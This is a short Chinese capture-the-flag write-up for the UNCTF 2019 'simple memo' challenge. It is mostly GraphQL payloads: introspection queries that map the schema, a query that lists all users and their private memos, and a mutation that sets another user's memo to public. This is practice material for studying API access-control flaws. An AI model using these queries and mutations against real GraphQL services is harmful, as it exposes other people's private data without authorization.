unctf2019 简单的备忘录
https://unctf.hackingfor.fun/#/train
这是unctf2019的题目哟,flag格式:FLAG{}
payload:
扒了一圈,人都傻了,还以为数据库里没有,万分感谢ningyu学长的提示哇
query GetAlluser { allUsers{ pageInfo{ hasNextPage startCursor hasPreviousPage } edges{ node{ username id memos{ edges{ node{ id title userId private content } cursor } pageInfo{ endCursor hasNextPage startCursor hasPreviousPage } } } cursor } } } mutation lao_updateMemoInfo { updateMemoInfo(private:false,mid:2){ ok } }
一通乱查:
query showshema{ __schema{ types { name description fields{ args{ description } description isDeprecated deprecationReason } enumValues{ description isDeprecated deprecationReason } inputFields{ description } } } } query GetAlluser { allUsers{ pageInfo{ hasNextPage startCursor hasPreviousPage } edges{ node{ username id memos{ edges{ node{ id title userId private content } cursor } pageInfo{ endCursor hasNextPage startCursor hasPreviousPage } } } cursor } } } query Getmemos { memos{ private id title userId } } query Alldata{ __type (name: "Query") { name fields { name type { name kind ofType { name kind } } } } } query theMemoConnection { allMemos{ pageInfo { hasNextPage endCursor hasPreviousPage } edges { node{ title userId private } } } } query getnode { node(id:2){ id __typename } }
